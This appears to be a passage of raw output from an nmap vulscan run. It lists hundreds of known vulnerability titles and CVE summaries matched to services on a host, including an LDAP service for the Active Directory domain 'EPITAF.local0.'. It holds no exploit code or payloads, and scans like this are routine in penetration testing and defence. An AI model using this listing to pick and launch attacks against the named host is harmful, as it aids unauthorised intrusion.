DoS [3325] Microsoft IIS HTR ISAPI Overflow [3323] Microsoft IIS ISAPI .printer Extension Host Header Overflow [3320] Microsoft IIS ASP Server-Side Include Buffer Overflow [3316] Microsoft IIS HTTP Header Field Delimiter Overflow [3313] Microsoft Word Form Protection Bypass [3307] Microsoft IE showHelp() Zone Restriction Bypass [3301] Microsoft IIS ASP Chunked Encoding Variant Heap Overflow [3300] Microsoft FrontPage shtml MS-DOS Device Name DoS [3284] Microsoft IIS Winmsdp.exe Arbitrary File Retrieval [3257] Jordan Windows Telnet Server Overflow [3231] Microsoft IIS Log Bypass [3225] Microsoft IE for Mac Information Disclosure [3195] Microsoft Exchange OWA REFERER Header XSS [3144] Microsoft IE MHTML Redirection Local File Parsing (MhtRedirParsesLocalFile) [3143] Microsoft IE MHTML Arbitrary File Execution (MhtRedirLaunchInetExe) [3142] Microsoft IE Subframe XSS (BackToFramedJpu) [3108] Microsoft Office 98 Macintosh Information Disclosure [3104] Microsoft IE PPC Overwrite Arbitrary Files [3099] Microsoft IE _search Window Execute Code (WsBASEjpu) [3098] Microsoft IE history.back NAF Function Execute Script (NAFjpuInHistory) [3097] Microsoft IE window.open Function Execute Code (WsFakeSrc) [3096] Microsoft IE NavigateAndFind Function Execute Code (NAFfileJPU) [3095] Microsoft IE history.back Function Information Disclosure (RefBack) [3094] Microsoft IE window.moveBy Cursor Hijack (HijackClick) [3068] Microsoft IE MSHTML/EditFlag Auto Open DoS [3066] Microsoft IE Custom HTTP Errors Script Injection [3065] Microsoft IE Unparsable XML File XSS [3056] Microsoft IE MSN/Alexa Information Leak [3055] Microsoft IE Spoofed URL [3054] Microsoft IE %USERPROFILE% Folder Disclosure [3053] Microsoft IE MHTML File Handler Arbitrary Script Injection [3052] Microsoft IE/Outlook CODEBASE PopUp Object Remote Execution [3051] Microsoft IE MHT Web Archive Overflow [3050] Microsoft IE dragDrop Method Local File Reading [3049] Microsoft IE ftp.htt FTP Web View URL XSS [3036] Microsoft IE dynsrc File Information Leak [3035] Microsoft WebBrowser Control t:video File Execution [3034] Microsoft IE JavaScript script src Local File Enumeration [3033] Microsoft IE Content Type/Disposition File Execution [3032] Microsoft IE XMLHTTP Control Arbitrary Remote File Access [3031] Microsoft IE document.Open Same Origin Policy Violation [3030] Microsoft IE GetObject() Function Traveral Arbitrary File Access [3029] Microsoft IE Cookie Execute Script in Local Computer Zone [3028] Microsoft IE Content-disposition Header Auto Download/Execute [3011] Microsoft IE OWC ConnectionFile File Existence Verification [3010] Microsoft IE OWC XMLURL File Existence Verification [3009] Microsoft IE OWC Load File Existence Verification [3008] Microsoft IE OWC Cut/Paste Data Read and Injection [3007] Microsoft IE OWC LoadText Read Arbitrary File [3006] Microsoft IE OWC Script Execution [3005] Microsoft IE WebBrowser Control dialogArguments XSS [3004] Microsoft IE Gopher Client Overflow [3003] Microsoft IE/Outlook OBJECT Cross Domain Scripting [3002] Microsoft IE File Extension Dot Parsing [3001] Microsoft IE XP HCP URI Handler File Deletion [2999] Microsoft IE Powerpoint Mouse-Over Execute [2998] Microsoft IE Frame Javascript URL Cross-Domain Script Execution [2997] Microsoft IE oIFrameElement.Document IFRAME Bypass [2996] Microsoft IE Object Zone Redirection [2995] Microsoft IE (VictimWindow).document.write Cross Domain Scripting (SaveRef) [2994] Microsoft IE (NewWindow).location.assign Save Reference [2993] Microsoft IE % URL Encoding XSS [2992] Microsoft IE HTML Help ActiveX Control alink and showHelp Overflow [2991] Microsoft WinHlp Active-X Item Parameter Overflow [2990] Microsoft IE IFRAME dialogArguments Object Bypass (BadParent) [2986] Microsoft IE clipboardData Object Caching Cross-domain Policy Bypass [2985] Microsoft IE execCommand Object Caching [2984] Microsoft IE getElementsByTagName Object Caching [2983] Microsoft IE getElementsByName Object Caching [2982] Microsoft IE getElementById Object Caching [2981] Microsoft IE elementFromPoint Object Caching [2980] Microsoft IE createRange Object Caching [2979] Microsoft IE external Object Caching [2978] Microsoft IE showModalDialog Object Caching [2977] Microsoft IE XML Datasource Read Local Files [2976] Microsoft IE CTRL Key onkeydown Remote File Theft [2975] Microsoft IE Back Button XSS [2974] Microsoft IE/Outlook Temporary Internet File Execution [2973] Microsoft IE Third Party Plugin Rendering XSS [2972] Microsoft IE showModalDialog Script Execution [2971] Microsoft WMP File Attachment Script Execution [2970] Microsoft IE cssText Arbitrary File Access [2969] Microsoft VM Bytecode Verifier Execute Arbitrary Code [2968] Microsoft IE File Download Dialog Overflow [2967] Microsoft IE Object Type Property Overflow [2966] Microsoft IE BR549.DLL Overflow [2965] Microsoft IE Cache Script Execution in My Zone [2963] Microsoft IE align HTML Converter Overflow [2952] Microsoft FrontPage Server Extensions (fp30reg.dll) Debug Function Chunked Encoded Request Remote Overflow [2917] Microsoft Access Known Database Attack [2801] Microsoft Word and Excel Execution of Arbitrary Code [2800] Microsoft FrontPage Server Extensions SmartHTML DoS [2784] Microsoft IE Component Function Information Disclosure [2783] Microsoft IE XML Objection Information Disclosure (IredirNrefresh) [2751] Microsoft Word Macro Name Handling Overflow [2745] Microsoft HTML Help Control Privilege Escalation [2707] Microsoft IE Drag and Drop Arbitrary File Installation [2679] Microsoft Outlook Web Access XSS [2674] Microsoft Exchange SMTP Extended Request Overflow [2592] Microsoft PowerPoint Modify Protection Bypass [2572] Microsoft BizTalk Server Insecure Permissions [2544] Microsoft ASP.NET Request Validation Bypass [2510] Microsoft Access Snapshot Viewer Buffer Overflow [2508] Microsoft Visual Basic for Applications Buffer Overflow [2506] Microsoft Word/Works Automated Macro Execution [2453] Microsoft IE My Computer Zone Caching Issue [2451] Microsoft IE Object Data Header Type Safe File Execution [2423] Microsoft MCWNDX.OCX ActiveX Plugin Overflow [2329] Microsoft SQL Server Named Pipe Hijacking Local Privilege Escalation [2320] Microsoft ISA Server HTTP Error Handler XSS [2306] Microsoft FrontPage Server Extensions SmartHTML Interpreter shtml.dll DoS [2299] Microsoft SQL Server Named Pipe Handling Request Remote DoS [2298] Microsoft ISA Server Error Page XSS [2291] Microsoft IE DOM Script Source Recursive DoS [2288] Microsoft Utility Manager Local Privilege Escalation [2283] Microsoft Exchange OWA Execute Arbitrary Code [2239] Microsoft NetMeeting Arbitrary File Write/Execution [2106] Microsoft Media Services ISAPI nsiislog.dll Overflow [2096] Microsoft ISA Server SurfControl Web Filter [2062] CiscoSecure ACS For Windows Format String Overflow [2061] Microsoft Outlook HTML Mail Script Execution [2060] Microsoft IE Known Local File Script Execution [2049] Microsoft Commerce Server ISAPI Long Authentication Overflow [2047] Microsoft IE Content-Type Field Arbitrary File Execution [2046] Microsoft IE Forced Script Execution [2045] Microsoft IE HTML Document Directive Overflow [2043] Microsoft Telnet Server Protocol Option Handling Remote Overflow [2042] Microsoft Exchange System Attendant WinReg Remote Registry Key Manipulation [2041] Microsoft Office for Macintosh Network PID Checker DoS [2010] Microsoft SQL Server C Runtime Functions Format String DoS [2008] Microsoft IE Same Origin Policy Violation [2004] Microsoft IE Cross-frame Remote File Access [1995] Microsoft IE Download Dialog File Extension Spoofing Weakness [1992] Microsoft IE Cookie Disclosure [1982] Microsoft IE about: URI XSS [1978] Microsoft IE for Mac OS Download Execution [1972] Microsoft IE HTTP Request Encoding Spoofing Weakness [1971] Microsoft IE Dotless IP Zone Spoofing Weakness [1968] Microsoft Excel/PowerPoint Macro Security Bypass [1957] Microsoft Exchange OWA Malformed Request DoS [1949] Symantec Norton Anti-Virus for Microsoft Exchange 2000 INBOX Path Information Disclosure [1934] Microsoft ISA Server Invalid URL Error Message XSS [1933] Microsoft ISA Server Proxy Service Memory Leak DoS [1932] Microsoft ISA Server H.323 Memory Leak DoS [1931] Microsoft IIS MIME Content-Type Header DoS [1930] Microsoft IIS SSI ssinc.dll Filename Handling Overflow [1927] Window Maker wmaker Long Windows Title overflow [1902] Microsoft Outlook View ActiveX Arbitrary Command Execution [1867] Microsoft Word Document Macro Execution [1864] Microsoft SQL Server Administrator Cached Connection [1856] Microsoft Exchange OWA Embedded Script Execution [1852] Microsoft Outlook Address Book Spoofing Weakness [1838] Microsoft Word .asd Macro File Execution [1837] Microsoft Word RTF Template Macro Execution [1832] Microsoft IE Spoofed SSL Certificates [1831] Microsoft IE Server Certificate Validation Failure [1826] Microsoft IIS Domain Guest Account Disclosure [1824] Microsoft IIS FTP DoS [1820] Microsoft Index Server Search Parameter Overflow [1819] Windows 2000 Kerberos LSA Memory Leak/DoS [1804] Microsoft IIS Long Request Parsing Remote DoS [1789] Microsoft ISA Server Web Proxy Malformed HTTP Request Parsing Remote DoS [1770] Microsoft IIS WebDAV Malformed PROPFIND Request Remote DoS [1750] Microsoft IIS File Fragment Disclosure [1724] Microsoft Web Client Extender NTLM Credential Disclosure [1685] Microsoft IE .lnk/.url Arbitrary Command Execution [1650] Microsoft Exchange Server EUSR_EXSTOREEVENT Default Account [1609] Microsoft NetMeeting Remote Desktop Sharing Malformed String Handling DoS [1606] Microsoft IE Cached Web Credentials Disclosure [1568] CiscoSecure ACS for Windows CSAdmin Login Overflow DoS [1553] Microsoft WebTV annclist.exe Malformed UDP Packet Parsing Remote DoS [1543] Microsoft NT/IIS Invalid URL Request DoS [1537] Microsoft Outlook Rich Text Format Information Disclosure [1530] Microsoft Money Cleartext Password Storage [1510] Microsoft IE Folder.htt Modification Privilege Escalation [1505] Microsoft Word Mail Merge Arbitrary Command Execution [1504] Microsoft IIS File Permission Canonicalization Bypass [1502] Microsoft IE Scriptlet Rendering [1500] Microsoft Word / Excel / Powerpoint 2000 Object Tag Buffer Overflow [1477] Windows NT FTP Server (WFTP) STAT/LIST Command Parsing Remote DoS [1475] Microsoft Outlook/Express Cache Bypass [1467] Microsoft Outlook/Express GMT Field Buffer Overflow [1465] Microsoft IIS .htr Missing Variable DoS [1464] Microsoft IE/Outlook DHTMLED / IFRAME Arbitrary File Access [1461] Microsoft Enterprise Manager DTS Package Password Disclosure [1455] Microsoft Excel REGISTER.ID Function Arbitrary Code Execution [1451] Microsoft SQL Server Stored Procedure Local Permission Restriction Bypass [1428] Microsoft IE/Office ActiveX Object Execution [1427] Microsoft IE VBA Code Execution [1378] Microsoft IE SSL Certificates Validation Failure (v1) [1369] Microsoft SQL Server DTS Password Disclosure [1368] Microsoft Media Encoder Request Parsing Local DoS [1342] Microsoft IE DocumentComplete() Cross Frame Access [1341] Microsoft IE ActiveX Combined Component Attributes [1328] Microsoft Office 2000 UA Control ActiveX (Ouactrl.ocx) Show Me Function Remote Code Execution [1326] Microsoft IE Crafted URL Cross Domain Cookie Disclosure [1325] Microsoft IIS Malformed Filename Request File Fragment Disclosure [1322] Microsoft IIS Malformed .htr Request DoS [1281] Microsoft IIS Escaped Character Saturation Remote DoS [1272] Microsoft Excel XLM Arbitrary Macro Execution [1261] Microsoft IIS Chunked Transfer Encoding Remote Overflow DoS [1250] Microsoft SQL Server Non-Validated Query [1244] Microsoft Clip Art Buffer Overflow [1210] Microsoft IIS WebHits.dll ISAPI Filter Traversal Arbitrary File Access [1209] Microsoft Terminal Server rdisk Registry Information Disclosure [1208] Microsoft East Asian Word Conversion Document Arbitrary Command Execution [1207] Microsoft SMS Remote Control Weak Permission Privilege Escalation [1188] Microsoft CIS IMAP Server Remote Overflow [1170] Microsoft IIS Escape Character URL Access Bypass [1156] Microsoft IE MSDXM.OCX vnd.ms.radio URL Handling Overflow [1152] Microsoft IE Web Proxy Auto-Discovery Unauthorized Proxy Reconfiguration [1145] Microsoft IE Offline Browsing Pack Task Scheduler [1143] Microsoft SQL Server TDS Header NULL Data Handling Remote DoS [1139] Microsoft Rich Text Format (RTF) Reader Malformed Control Word Overflow [1130] Windows NT FTP Server (WFTP) MKD/CWD Nested Command Remote Overflow [1083] Microsoft IIS FTP NO ACCESS Read/Delete File [1082] Microsoft IIS Domain Resolution Access Bypass [1069] Microsoft IE Import/Export Favorites [1056] Microsoft Java Virtual Machine Sandbox Bypass [1054] Microsoft IE scriptlet.typelib ActiveX Arbitrary Command Execution [1052] Microsoft Jet Database Text I-ISAM Arbitrary File Modification [1041] Microsoft IIS Malformed HTTP Request Header DoS [1032] Microsoft FrontPage PWS GET Request Handling Remote DoS [1031] Microsoft Exchange Server Encapsulated SMTP Address Open Relay [1020] Microsoft IIS ISAPI GetExtensionVersion() Privilege Escalation [1019] Microsoft Taskpads Feature Arbitrary Script Injection [956] Windows NT RAS Phonebook Overflow [946] Windows NT KnownDLLs Modification Privilege Escalation [930] Microsoft IIS Shared ASP Cache Information Disclosure [929] Microsoft IIS FTP Server NLST Command Overflow [928] Microsoft IIS Long Request Log Evasion [925] Microsoft Excel 97 CALL Arbitrary Command Execution [922] Microsoft NetMeeting Clipboard Remote Overflow [878] Microsoft SQL Resolution Service Keep-Alive Function DoS [866] Microsoft Remote Data Protocol (RDP) Implementation Cryptographic Information Disclosure [863] Microsoft Exchange Malformed Mail Attribute DoS [852] Microsoft Exchange EHLO Long Hostname Overflow [831] Microsoft Site Server LDAP_Anonymous Account Default Password [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure [815] Microsoft IIS ASP.NET trace.axd Application Tracing Information Disclosure [814] Microsoft IIS global.asa Remote Information Disclosure [782] Microsoft IIS / Site Server codebrws.asp Arbitrary File Access [771] Microsoft IIS Hosting Process (dllhost.exe) Out of Process Application Unspecified Privilege Escalation [768] Microsoft IIS ASP Chunked Encoding Heap Overflow [763] Microsoft IE VBScript Mis-Handling Arbitrary File Access [687] Multiple Vendor FTPD on Windows Floppy Request CPU Consumption DoS [685] Cisco PIX Firewall Manager (PFM) on Windows Web Interface Traversal Arbitrary File Access [636] Microsoft IIS sqlqhit.asp Sample Script CiScope Parameter Information Disclosure [630] Microsoft IIS Multiple Malformed Header Field Internal IP Address Disclosure [626] Microsoft Exchange OWA fumsg.asp Global Address List (GAL) Disclosure [601] Microsoft Exchange Server LDAP Bind Function Overflow [574] OpenWindows winselection Race Condition Privileged Content Disclosure [568] Microsoft IIS idq.dll IDA/IDQ ISAPI Remote Overflow [564] Microsoft IIS ISM.dll Fragmented Source Disclosure [558] Microsoft SQL Server 0x02 Packet Remote Information Disclosure [556] Microsoft IIS/PWS Encoded Filename Arbitrary Command Execution [553] Microsoft Index Server Malformed Search Arbitrary Server-side Include File Access [531] Microsoft SQL Server Registry Key Permission Weakness Privilege Escalation [525] Microsoft IIS Webserver Invalid Filename Request Arbitrary Command Execution [516] Microsoft Point-to-Point Tunneling Protocol (PPTP) Encryption Weakness [482] Microsoft IIS FrontPage Server Extensions (FPSE) Malformed Form DoS [475] Microsoft IIS bdir.htr Arbitrary Directory Listing [474] Microsoft IIS / Site Server viewcode.asp Arbitrary File Access [473] Microsoft IIS Multiple .cnf File Information Disclosure [471] Microsoft IIS ServerVariables_Jscript.asp Path Disclosure [470] Microsoft IIS Form_JScript.asp XSS [463] Microsoft IIS Phone Book Service /pbserver/pbserver.dll Remote Overflow [457] Microsoft Exchange Malformed MIME Header DoS [436] Microsoft IIS Unicode Remote Command Execution [425] Microsoft IIS WebDAV SEARCH Method Arbitrary Directory Forced Listing [414] OpenWindows ttyselection Race Condition Privileged Content Disclosure [396] Microsoft FrontPage shtml.exe MS-DOS Device Name Request DoS [391] Microsoft IIS IDA/IDQ Document Root Path Disclosure [390] Microsoft IIS Translate f: Request ASP Source Disclosure [386] Windows NT FTP Server (WFTP) Unauthenticated MLST Command Remote DoS [384] Windows 2000 Service Control Manager Named Pipe Impersonation [380] MySQL Server on Windows Default Null Root Password [365] Windows NT FTP Server (WFTP) Out of Sequence RNTO Command Remote DoS [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing [308] Microsoft IIS Malformed File Extension URL DoS [307] Microsoft FrontPage 2000 Server Extensions shtml.exe Path Disclosure [285] Microsoft IIS repost.asp File Upload [284] Microsoft IIS IISADMPWD Virtual Directory Information Enumeration [283] Microsoft IIS /iissamples Multiple Sample Scripts Installed [282] Microsoft FrontPage dvwssr.dll Backdoor and Overflow [277] Microsoft IIS / PWS %2e Request ASP Source Disclosure [276] Microsoft IIS ASP::$DATA Stream Request ASP Source Disclosure [275] Microsoft IIS newdsn.exe Remote Arbitrary File Creation [274] Microsoft IIS ctss.idc ODBC Sample Arbitrary Command Execution [273] Microsoft IIS Upgrade ism.dll Local Privilege Escalation [272] Microsoft IIS MDAC RDS Arbitrary Remote Command Execution [271] Microsoft IIS WebHits null.htw .asp Source Disclosure [241] Windows NT FTP Server (WFTP) Unpassworded Guest Account [111] Microsoft Personal Web Server Multiple Dot Request Arbitrary File Access [98] Microsoft IIS perl.exe HTTP Path Disclosure [97] Microsoft IIS ISM.DLL HTR Request Overflow [96] Microsoft IIS idq.dll Traversal Arbitrary File Access [68] Microsoft FrontPage Extensions .pwd File Permissions [67] Microsoft FrontPage Extension shtml.dll Anonymous Account Information Disclosure [7] Microsoft IIS / Site Server showcode.asp source Parameter Traversal Arbitrary File Access [4] Microsoft IIS ExAir advsearch.asp Direct Request Remote DoS [3] Microsoft IIS ExAir query.asp Direct Request Remote DoS [2] Microsoft IIS ExAir search.asp Direct Request DoS
389	tcp	open	ldap	syn-ack	Microsoft Windows Active Directory LDAP		Domain: EPITAF.local0., Site: Default-First-Site-Name
	vulscan	VulDB - https://vuldb.com: [160873] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160870] Microsoft Windows up to Server 2019 Active Directory Federation Service 2FA weak authentication [160864] Microsoft Windows up to Server 2019 Active Directory integrated DNS privilege escalation [160863] Microsoft Windows up to Server 2019 Active Directory integrated DNS memory corruption [160862] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [155092] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [149893] Microsoft Windows up to Server 2019 Active Directory privilege escalation [141620] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [139937] Microsoft Windows up to Server 2019 Azure Active Directory information disclosure [131642] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Active Directory privilege escalation [126730] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [124217] Microsoft Windows Server 2012/Server 2016 Active Directory Federation Services /adfs/ls privilege escalation [116020] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Active Directory 7PK Security Features [99683] Microsoft Windows 10 1607/10 1703/Server 2012 R2/Server 2016 Active Directory 7PK Security Features [99667] Microsoft Windows 10/Server 2016 Active Directory Service Unresponsive privilege escalation [98110] Microsoft Windows Active Directory Federation Services information disclosure [88781] Microsoft Windows 2000 Active Directory Schema privilege escalation [88644] Microsoft Windows 2000 Active Directory Kerberos Ticket Logging privilege escalation [87960] Microsoft Windows Server 2008 R2/Server 2012/Server 2012 R2 Active Directory privilege escalation [80878] Microsoft Windows Server 2012 R2 Active Directory Federation Service privilege escalation [77640] Microsoft Windows Active Directory Code [75783] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services cross site scripting [74834] Microsoft Windows Server 2012 R2 Active Directory Federation Services 3.0 privilege escalation [45063] Microsoft Windows Server 2003 Active Directory information disclosure [26516] Microsoft Windows 95/98/ME/NT 4.0 Active Directory unknown vulnerability [19970] Microsoft Windows 2000 Active Directory privilege escalation [10190] Microsoft Windows 7/8/Server 2008/Vista Active Directory privilege escalation [9929] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services information disclosure [4474] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Active Directory Query memory corruption [4440] Microsoft Windows Active Directory weak authentication [4364] Microsoft Windows Active Directory cross site scripting [4067] Microsoft Windows Active Directory Federation Service privilege escalation [4058] Microsoft Windows Active Directory denial of service [3845] Microsoft Windows 2000 SP4 Active Directory denial of service [3733] Microsoft Windows Active Directory privilege escalation [3179] Microsoft Windows Active Directory denial of service [3178] Microsoft Windows Active Directory memory corruption [2689] Microsoft Windows up to 2000 SP4 Active Directory denial of service [145] Microsoft Windows 2000 Active Directory weak authentication [134] Microsoft Windows up to 2000 SP3 Active Directory memory corruption [157918] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151146] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151100] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151097] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [146442] F5 BIG-IP Active Directory/LDAP/Client Certificate weak authentication [145356] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [140066] Microsoft NuGet/ADAL.NET Azure Active Directory privilege escalation [136274] Microsoft Windows up to Server 2019 ActiveX memory corruption [134752] Microsoft Azure Active Directory Connect 1.3.20.0 PowerShell privilege escalation [131628] Microsoft Windows up to Server 2019 ActiveX memory corruption [123141] Samba up to 4.6.15/4.7.8/4.8.3 Active Directory LDAP Server information disclosure [121120] Microsoft Active Directory Federation Services Web Customizations cross site scripting [101011] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 ActiveX Object Memory information disclosure [99685] Microsoft Windows up to Vista SP2 LDAP privilege escalation [92249] Microsoft Azure Active Directory Passport up to 1.4.5/2.0.0 weak authentication [79863] Samba up to 4.3.2 Windows Active Directory Server privilege escalation [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal [68590] Microsoft Windows up to Vista TS WebProxy directory traversal [66445] Microsoft Windows 8.0/8.1 XMLDOM ActiveX Control privilege escalation [51811] Microsoft Windows max3activex.dll privilege escalation [51497] Microsoft Windows Live Messenger 2009 ActiveX Control msnmsgr.exe denial of service [48518] Microsoft ADAM XP Active Directory denial of service [46007] Microsoft Windows Mobile 6.0 FTP Service directory traversal [43982] Microsoft Windows Image Acquisition Logger ActiveX Control privilege escalation [43953] Microsoft Windows ActiveX Control wmex.dll memory corruption [43659] Microsoft Windows Messenger 5.1 ActiveX Control information disclosure [42638] Microsoft Windows Installer 3.1.4000.1823 ActiveX Control msiexec.exe memory corruption [20978] Microsoft Windows Server 2003 Shell Link directory traversal [20961] Microsoft Windows up to 2000 SP4 Troubleshooter ActiveX Control Tshoot.ocx RunQuery2 memory corruption [19042] Microsoft Windows NT 4.0/2000/XP HTML Help ActiveX Control hhctrl.ocx alink memory corruption [18810] Microsoft Windows up to XP Certificate Enrollment ActiveX Control unknown vulnerability [18709] Microsoft Windows HTML Help ActiveX Control Winhlp32.exe memory corruption [16706] Microsoft Windows Media Player 7 WMP ActiveX Control privilege escalation [16098] Microsoft Windows NT 4.0 Cenroll ActiveX Control xenroll.dll denial of service [16055] Microsoft Windows 2000 System Monitor ActiveX Control memory corruption [14976] Microsoft Windows Media Player ActiveX Control File information disclosure [14348] Microsoft Windows NT Directory privilege escalation [8203] Microsoft Windows up to 2012 AD LDAP Query privilege escalation [4452] Microsoft Windows Adctive Directory Query memory corruption [4447] Microsoft Windows Time ActiveX Control privilege escalation [4050] Microsoft Windows ActiveX Control memory corruption [4049] Microsoft Windows ActiveX Controls ATL OleLoadFromStream privilege escalation [4026] Microsoft Windows DHTML Editing ActiveX Control privilege escalation [3674] Microsoft Windows ActiveX Control hxvz.dll privilege escalation [3309] Microsoft Visual Studio 6 ActiveX Control VBTOVSI.dll directory traversal [3308] Microsoft Visual Studio 6 ActiveX Control PDWizard.ocx directory traversal [2925] Microsoft Windows HTML Help ActiveX Control memory corruption [2687] Microsoft Windows 2000/Server 2003/XP Agent ActiveX Numeric Error [908] Microsoft Windows XP JPEG ActiveX Image Control asycpict.dll denial of service [155] Microsoft Windows up to 2000 SP3 LDAP Cryptnet.DLL denial of service MITRE CVE - https://cve.mitre.org: [CVE-2011-2014] The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not examine Certificate Revocation Lists (CRLs), which allows remote authenticated users to bypass intended certificate restrictions and access Active Directory resources by leveraging a revoked X.509 certificate for a domain account, aka "LDAPS Authentication Bypass Vulnerability." [CVE-2009-1928] Stack consumption vulnerability in the LDAP service in Active Directory on Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2 [CVE-2009-1139] Memory leak in the LDAP service in Active Directory on Microsoft Windows 2000 SP4 and Server 2003 SP2, and Active Directory Application Mode (ADAM) on Windows XP SP2 and SP3 and Server 2003 SP2, allows remote attackers to cause a denial of service (memory consumption and service outage) via (1) LDAP or (2) LDAPS requests with unspecified OID filters, aka "Active Directory Memory Leak Vulnerability." [CVE-2009-1138] The LDAP service in Active Directory on Microsoft Windows 2000 SP4 does not properly free memory for LDAP and LDAPS requests, which allows remote attackers to execute arbitrary code via a request that uses hexadecimal encoding, whose associated memory is not released, related to a "DN AttributeValue," aka "Active Directory Invalid Free Vulnerability." NOTE: this issue is probably a memory leak. [CVE-2008-5112] The LDAP server in Active Directory in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 responds differently to a failed bind attempt depending on whether the user account exists and is permitted to login, which allows remote attackers to enumerate valid usernames via a series of LDAP bind requests, as demonstrated by ldapuserenum. [CVE-2008-4023] Active Directory in Microsoft Windows 2000 SP4 does not properly allocate memory for (1) LDAP and (2) LDAPS requests, which allows remote attackers to execute arbitrary code via a crafted request, aka "Active Directory Overflow Vulnerability." [CVE-2008-1445] Active Directory on Microsoft Windows 2000 Server SP4, XP Professional SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to cause a denial of service (system hang or reboot) via a crafted LDAP request. [CVE-2008-0088] Unspecified vulnerability in Active Directory on Microsoft Windows 2000 and Windows Server 2003, and Active Directory Application Mode (ADAM) on XP and Server 2003, allows remote attackers to cause a denial of service (hang and restart) via a crafted LDAP request. [CVE-2007-3028] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4 does not properly check "the number of convertible attributes", which allows remote attackers to cause a denial of service (service unavailability) via a crafted LDAP request, related to "client sent LDAP request logic," aka "Windows Active Directory Denial of Service Vulnerability". NOTE: this is probably a different issue than CVE-2007-0040. [CVE-2007-0040] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4, Server 2003 SP1 and SP2, Server 2003 x64 Edition and SP2, and Server 2003 for Itanium-based Systems SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted LDAP request with an unspecified number of "convertible attributes." [CVE-2013-1282] The LDAP service in Microsoft Active Directory, Active Directory Application Mode (ADAM), Active Directory Lightweight Directory Service (AD LDS), and Active Directory Services allows remote attackers to cause a denial of service (memory consumption and service outage) via a crafted query, aka "Memory Consumption Vulnerability." [CVE-2011-3406] Buffer overflow in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote authenticated users to execute arbitrary code via a crafted query that leverages incorrect memory initialization, aka "Active Directory Buffer Overflow Vulnerability." [CVE-2011-1264] Cross-site scripting (XSS) vulnerability in Active Directory Certificate Services Web Enrollment in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Active Directory Certificate Services Vulnerability." [CVE-2011-1247] Untrusted search path vulnerability in the Microsoft Active Accessibility component in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Active Accessibility Insecure Library Loading Vulnerability." [CVE-2011-0654] Integer underflow in the BowserWriteErrorLogEntry function in the Common Internet File System (CIFS) browser service in Mrxsmb.sys or bowser.sys in Active Directory in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via a malformed BROWSER ELECTION message, leading to a heap-based buffer overflow, aka "Browser Pool Corruption Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2011-0040] The server in Microsoft Active Directory on Windows Server 2003 SP2 does not properly handle an update request for a service principal name (SPN), which allows remote attackers to cause a denial of service (authentication downgrade or outage) via a crafted request that triggers name collisions, aka "Active Directory SPN Validation Vulnerability." [CVE-2010-0820] Heap-based buffer overflow in the Local Security Authority Subsystem Service (LSASS), as used in Active Directory in Microsoft Windows Server 2003 SP2 and Windows Server 2008 Gold, SP2, and R2 [CVE-2009-2509] Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly validate headers in HTTP requests, which allows remote authenticated users to execute arbitrary code via a crafted request to an IIS web server, aka "Remote Code Execution in ADFS Vulnerability." [CVE-2009-2508] The single sign-on implementation in Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly remove credentials at the end of a network session, which allows physically proximate attackers to obtain the credentials of a previous user of the same web browser by using data from the browser's cache, aka "Single Sign On Spoofing in ADFS Vulnerability." [CVE-2008-3539] Unspecified vulnerability in HP OpenView Select Identity (HPSI) Connectors on Windows, as used in HPSI Active Directory Connector 2.30 and earlier, HPSI SunOne Connector 1.14 and earlier, HPSI eDirectory Connector 1.12 and earlier, HPSI eTrust Connector 1.02 and earlier, HPSI OID Connector 1.02 and earlier, HPSI IBM Tivoli Dir Connector 1.02 and earlier, HPSI TOPSecret Connector 2.22.001 and earlier, HPSI RACF Connector 1.12.001 and earlier, HPSI ACF2 Connector 1.02 and earlier, HPSI OpenLDAP Connector 1.02 and earlier, and HPSI BiDir DirX Connector 1.00.003 and earlier, allows local users to obtain 